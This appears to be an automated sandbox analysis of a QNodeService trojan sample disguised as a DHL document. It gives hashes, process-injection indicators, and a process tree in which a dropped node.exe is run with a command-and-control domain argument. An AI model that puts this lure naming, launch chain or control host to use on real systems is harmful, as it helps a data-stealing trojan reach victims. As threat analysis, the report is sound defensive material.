qnodeservice | 3aab6806957de31da35823a6997b4aa7449602eff3a6ebe085da25bd7a06d8a3

Analysis

Target

DHL_OCT 2020 at 9.M_9B773000000032195537290.jar
Size

400KB
MD5

21d602df36cd7178f0dc9c48da5403e9
SHA1

dc251722d97937ad325a430625464274fd1bb57b
SHA256

3aab6806957de31da35823a6997b4aa7449602eff3a6ebe085da25bd7a06d8a3
SHA512

da385bff2be4c1db8cb30171ad046ad1c0438295734c8da6fb9a59b15d87d4bda134aa1bf8157c6251156e7341523e8d1a1d5cffbbaf72d0fb7d0e12f29909ab

Score

10^/10

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
trojan qnodeservice

Executes dropped EXE 1 IoCs

pid	Process
2360	node.exe

JavaScript code in executable 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ad70-169.dat	js

Suspicious behavior: EnumeratesProcesses 4 IoCs

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4016 wrote to memory of 3676	4016	java.exe	73
PID 4016 wrote to memory of 3676	4016	java.exe	73
PID 3676 wrote to memory of 2360	3676	javaw.exe	77
PID 3676 wrote to memory of 2360	3676	javaw.exe	77

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\DHL_OCT 2020 at 9.M_9B773000000032195537290.jar"
1⤵
- Suspicious use of WriteProcessMemory
PID:4016
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\808467ae.tmp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3676
- - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums330.hopto.org
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2360

memory/2360-172-0x0000018A06C00000-0x0000018A06C01000-memory.dmp

Filesize
4KB

Download